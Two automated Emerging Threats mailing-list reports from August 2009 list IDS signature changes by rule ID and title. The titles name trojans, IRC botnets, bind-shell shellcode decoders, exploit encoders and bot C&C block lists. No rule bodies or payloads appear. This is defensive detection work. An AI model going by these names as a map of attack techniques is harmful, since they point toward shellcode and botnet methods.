From emerging at emergingthreats.net Sat Aug 1 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 1 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090801200012.B38DA4504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 1 16:00:12 2009 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (64): 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (64): 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Aug 1 18:00:11 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 1 Aug 2009 18:00:11 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20090801220011.8C9704504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 1 18:00:11 2009 [***] [+++] Added rules: [+++] 2009694 - ET TROJAN Navipromo related update (emerging-virus.rules) 2009695 - ET CURRENT_EVENTS ISC BIND9 Update DoS (emerging.rules) 2009696 - ET POLICY External Connection to Altiris HelpDesk (emerging-policy.rules) 2009697 - ET POLICY External Connection to Altiris Console (emerging-policy.rules) 2009698 - ET VOIP INVITE Message Flood UDP (emerging-voip.rules) 2009699 - ET VOIP REGISTER Message Flood UDP (emerging-voip.rules) 2009700 - ET VOIP Multiple Unauthorized SIP Responses UDP (emerging-voip.rules) 2009701 - ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt (emerging.rules) 2009702 - ET CURRENT_EVENTS POLICY DNS Update From External net (emerging.rules) 2009703 - ET MALWARE Suspicious User-Agent (INet) (emerging-malware.rules) [+++] Enabled and modified rules: [+++] 2009130 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Request (emerging-virus.rules) 2009131 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Response (emerging-virus.rules) [///] Modified active rules: [///] 2001406 - ET POLICY Possible hidden zip extension .cpl (emerging-policy.rules) 2001407 - ET POLICY Possible hidden zip extension .pif (emerging-policy.rules) 2001408 - ET POLICY Possible hidden zip extension .scr (emerging-policy.rules) 2002903 - ET EXPLOIT x86 PexFnstenvMov/Sub Encoder (emerging-exploit.rules) 2002904 - ET EXPLOIT x86 Alpha2 GetEIPs Encoder (emerging-exploit.rules) 2002905 - ET EXPLOIT x86 Countdown Encoder (emerging-exploit.rules) 2002906 - ET EXPLOIT x86 PexAlphaNum Encoder (emerging-exploit.rules) 2002907 - ET EXPLOIT x86 PexCall Encoder (emerging-exploit.rules) 2002908 - ET EXPLOIT x86 JmpCallAdditive Encoder (emerging-exploit.rules) 2003192 - ET VOIP INVITE Message Flood TCP (emerging-voip.rules) 2003193 - ET VOIP REGISTER Message Flood TCP (emerging-voip.rules) 2003194 - ET VOIP Multiple Unauthorized SIP Responses TCP (emerging-voip.rules) 2006910 - ET TROJAN perlb0t/w0rmb0t Response (Case 1) (emerging-virus.rules) 2006911 - ET TROJAN perlb0t/w0rmb0t Response (Case 2) (emerging-virus.rules) 2006912 - ET TROJAN perlb0t/w0rmb0t Response (Case 3) (emerging-virus.rules) 2007622 - ET TROJAN Kaiten IRCbotnet Response (emerging-virus.rules) 2007623 - ET TROJAN Kaiten IRCbotnet Commands (emerging-virus.rules) 2007624 - ET TROJAN Pitbull IRCbotnet Response (emerging-virus.rules) 2007851 - ET EXPLOIT Citrix Presentation Server Client WFICA.OCX ActiveX Component Heap Buffer Overflow Exploit (emerging-exploit.rules) 2008776 - ET EXPLOIT GuildFTPd CWD and LIST Command Heap Overflow - POC-1 (emerging-exploit.rules) 2008777 - ET EXPLOIT GuildFTPd CWD and LIST Command Heap Overflow - POC-2 (emerging-exploit.rules) 2009246 - ET ATTACK_RESPONSE Bindshell2 Decoder Shellcode (emerging-attack_response.rules) 2009247 - ET ATTACK_RESPONSE Rothenburg Shellcode (emerging-attack_response.rules) 2009248 - ET ATTACK_RESPONSE Lindau (linkbot) xor Decoder Shellcode (emerging-attack_response.rules) 2009249 - ET ATTACK_RESPONSE Adenau Shellcode (emerging-attack_response.rules) 2009250 - ET ATTACK_RESPONSE Mainz/Bielefeld Shellcode (emerging-attack_response.rules) 2009251 - ET ATTACK_RESPONSE Wuerzburg Shellcode (emerging-attack_response.rules) 2009252 - ET ATTACK_RESPONSE Schauenburg Shellcode (emerging-attack_response.rules) 2009253 - ET ATTACK_RESPONSE Koeln Shellcode (emerging-attack_response.rules) 2009254 - ET ATTACK_RESPONSE Lichtenfels Shellcode (emerging-attack_response.rules) 2009255 - ET ATTACK_RESPONSE Mannheim Shellcode (emerging-attack_response.rules) 2009256 - ET ATTACK_RESPONSE Berlin Shellcode (emerging-attack_response.rules) 2009257 - ET ATTACK_RESPONSE Leimbach Shellcode (emerging-attack_response.rules) 2009258 - ET ATTACK_RESPONSE Aachen Shellcode (emerging-attack_response.rules) 2009259 - ET ATTACK_RESPONSE Furth Shellcode (emerging-attack_response.rules) 2009260 - ET ATTACK_RESPONSE Langenfeld Shellcode (emerging-attack_response.rules) 2009261 - ET ATTACK_RESPONSE Bonn Shellcode (emerging-attack_response.rules) 2009262 - ET ATTACK_RESPONSE Siegburg Shellcode (emerging-attack_response.rules) 2009263 - ET ATTACK_RESPONSE Plain1 Shellcode (emerging-attack_response.rules) 2009264 - ET ATTACK_RESPONSE Plain2 Shellcode (emerging-attack_response.rules) 2009265 - ET ATTACK_RESPONSE Bindshell1 Decoder Shellcode (emerging-attack_response.rules) 2009286 - ET SCAN Modbus Scanning detected (emerging-scan.rules) 2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules) 2009679 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 1 (emerging-web_sql_injection.rules) 2009680 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 2 (emerging-web_sql_injection.rules) 2009683 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 5 (emerging-web_sql_injection.rules) 2009684 - ET WEB_SPECIFIC Phorum Possible Javascript/Remote-File-Inclusion 6 (emerging-web_sql_injection.rules) 2009685 - ET TROJAN Unkown Trojan User-Agent (5.1 ...) (emerging-virus.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules) 2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules) 2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules) 2404024 - ET DROP Known Bot C&C Server Traffic (group 25) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [///] 